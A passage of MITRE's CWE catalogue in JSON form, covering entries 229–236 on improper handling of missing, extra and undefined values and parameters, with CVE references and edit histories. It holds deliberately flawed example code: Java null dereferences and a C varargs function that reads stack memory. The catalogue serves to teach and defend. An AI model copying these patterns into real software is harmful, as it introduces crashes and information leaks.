Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes, Theoretical_Notes"}],"Previous_Entry_Name":[{"#text":"Structure and Validity Problems","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Handle Syntactically Invalid Structure","attr":{"@_Date":"2009-03-10"}}]}},"229":{"attr":{"@_ID":"229","@_Name":"Improper Handling of Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly handle when the expected number of values for parameters, fields, or arguments is not provided in input, or if those values are undefined.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"228","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Value Problems","attr":{"@_Date":"2008-04-11"}}}},"230":{"attr":{"@_ID":"230","@_Name":"Improper Handling of Missing Values","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a parameter, field, or argument name is specified, but the associated value is missing, i.e. it is empty, blank, or null.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"229","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0422","Description":"Blank Host header triggers resultant infoleak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0422"},{"Reference":"CVE-2000-1006","Description":"Blank \\"charset\\" attribute in MIME header triggers crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1006"},{"Reference":"CVE-2004-1504","Description":"Blank parameter causes external error infoleak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1504"},{"Reference":"CVE-2005-2053","Description":"Blank parameter causes external error infoleak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2053"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Value Error"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR08-J","Entry_Name":"Do not catch NullPointerException or any of its ancestors"}]},"Notes":{"Note":{"#text":"Some \\"crash by port scan\\" bugs are probably due to this, but lack of diagnosis makes it difficult to be certain.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Missing Value Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Missing Value","attr":{"@_Date":"2009-03-10"}}]}},"231":{"attr":{"@_ID":"231","@_Name":"Improper Handling of Extra Values","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when more values are provided than expected.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"229","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"120","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This typically occurs in situations when only one value is expected."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Extra Value Error"}},"Notes":{"Note":{"#text":"This can overlap buffer overflows.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Extra Value Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Extra Value","attr":{"@_Date":"2009-03-10"}}]}},"232":{"attr":{"@_ID":"232","@_Name":"Improper Handling of Undefined Values","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a value is not defined or supported for the associated parameter, field, or argument name.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"229","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, an address parameter is read and trimmed of whitespace.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String address = request.getParameter(\\"address\\");address = address.trim();String updateString = \\"UPDATE shippingInfo SET address=\'?\' WHERE email=\'cwe@example.com\'\\";emailAddress = con.prepareStatement(updateString);emailAddress.setString(1, address);","xhtml:br":["","","",""]}},"Body_Text":"If the value of the address parameter is null (undefined), the servlet will throw a NullPointerException when the trim() is attempted."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2000-1003","Description":"Client crash when server returns unknown driver type.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1003"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Undefined Value Error"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR08-J","Entry_Name":"Do not catch NullPointerException or any of its ancestors"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Undefined Value Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Undefined Value","attr":{"@_Date":"2009-03-10"}}]}},"233":{"attr":{"@_ID":"233","@_Name":"Improper Handling of Parameters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly handle when the expected number of parameters, fields, or arguments is not provided in input, or if those parameters are undefined.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"228","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Parameter Problems"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"39"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Name, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Parameter Problems","attr":{"@_Date":"2013-07-17"}}}},"234":{"attr":{"@_ID":"234","@_Name":"Failure to Handle Missing Parameter","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"If too few arguments are sent to a function, the function will still pop the expected number of arguments from the stack. Potentially, a variable number of arguments could be exhausted in a function as well.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"233","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"],"Note":"There is the potential for arbitrary code execution with privileges of the vulnerable program if function parameter list is exhausted."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Potentially a program could fail if it needs more arguments then are available."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Build and Compilation","Description":"This issue can be simply combated with the use of proper build process."},{"Phase":"Implementation","Description":"Forward declare all functions. This is the recommended solution. Properly forward declaration of all used functions will result in a compiler error if too few arguments are sent to a function."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"foo_funct(one, two);void foo_funct(int one, int two, int three) {}","xhtml:br":["",""],"xhtml:div":{"#text":"printf(\\"1) %d\\\\n2) %d\\\\n3) %d\\\\n\\", one, two, three);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void some_function(int foo, ...) {}int main(int argc, char *argv[]) {}","xhtml:div":[{"#text":"int a[3], i;va_list ap;va_start(ap, foo);for (i = 0; i &lt; sizeof(a) / sizeof(int); i++) a[i] = va_arg(ap, int);va_end(ap);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"#text":"some_function(17, 42);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}],"Body_Text":"This can be exploited to disclose information with no work whatsoever. In fact, each time this function is run, it will print out the next 4 bytes on the stack after the two numbers sent to it."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0276","Description":"Server earlier allows remote attackers to cause a denial of service (crash) via an HTTP request with a sequence of \\"%\\" characters and a missing Host field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0276"},{"Reference":"CVE-2002-1488","Description":"Chat client allows remote malicious IRC servers to cause a denial of service (crash) via a PART message with (1) a missing channel or (2) a channel that the user is not in.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1488"},{"Reference":"CVE-2002-1169","Description":"Proxy allows remote attackers to cause a denial of service (crash) via an HTTP request to helpout.exe with a missing HTTP version numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1169"},{"Reference":"CVE-2000-0521","Description":"Web server allows disclosure of CGI source code via an HTTP request without the version number.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0521"},{"Reference":"CVE-2001-0590","Description":"Application server allows a remote attacker to read the source code to arbitrary \'jsp\' files via a malformed URL request which does not end with an HTTP protocol specification.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0590"},{"Reference":"CVE-2003-0239","Description":"Chat software allows remote attackers to cause a denial of service via malformed GIF89a headers that do not contain a GCT (Global Color Table) or an LCT (Local Color Table) after an Image Descriptor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0239"},{"Reference":"CVE-2002-1023","Description":"Server allows remote attackers to cause a denial of service (crash) via an HTTP GET request without a URI.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1023"},{"Reference":"CVE-2002-1236","Description":"CGI crashes when called without any arguments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1236"},{"Reference":"CVE-2003-0422","Description":"CGI crashes when called without any arguments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0422"},{"Reference":"CVE-2002-1531","Description":"Crash in HTTP request without a Content-Length field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1531"},{"Reference":"CVE-2002-1077","Description":"Crash in HTTP request without a Content-Length field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1077"},{"Reference":"CVE-2002-1358","Description":"Empty elements/strings in protocol test suite affect many SSH2 servers/clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1358"},{"Reference":"CVE-2003-0477","Description":"FTP server crashes in PORT command without an argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0477"},{"Reference":"CVE-2002-0107","Description":"Resultant infoleak in web server via GET requests without HTTP/1.0 version string.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0107"},{"Reference":"CVE-2002-0596","Description":"GET request with empty parameter leads to error message infoleak (path disclosure).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0596"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Parameter Error"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Missing parameter"}]},"Notes":{"Note":{"#text":"This entry will be deprecated in a future version of CWE. The term \\"missing parameter\\" was used in both PLOVER and CLASP, with completely different meanings. However, data from both taxonomies was merged into this entry. In PLOVER, it was meant to cover malformed inputs that do not contain required parameters, such as a missing parameter in a CGI request. This entry\'s observed examples and classification came from PLOVER. However, the description, demonstrative example, and other information are derived from CLASP. They are related to an incorrect number of function arguments, which is already covered by CWE-685.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-09","Modification_Importance":"Critical","Modification_Comment":"added maintenance note: this entry will probably be deprecated"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Missing Parameter Error","attr":{"@_Date":"2008-04-11"}}}},"235":{"attr":{"@_ID":"235","@_Name":"Improper Handling of Extra Parameters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when the number of parameters, fields, or arguments with the same name exceeds the expected amount.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"233","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This typically occurs in situations when only one element is expected to be specified."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2003-1014","Description":"MIE. multiple gateway/security products allow restriction bypass using multiple MIME fields with the same name, which are interpreted differently by clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1014"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Extra Parameter Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"460"}}},"Notes":{"Note":{"#text":"This type of problem has a big role in multiple interpretation vulnerabilities and various HTTP attacks.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Extra Parameter Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Extra Parameter","attr":{"@_Date":"2009-03-10"}}]}},"236":{"attr":{"@_ID":"236","@_Name":"Improper Handling of Undefined Parameters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a particular parameter, field, or argument name is not defined or supported by the product.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"233","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and 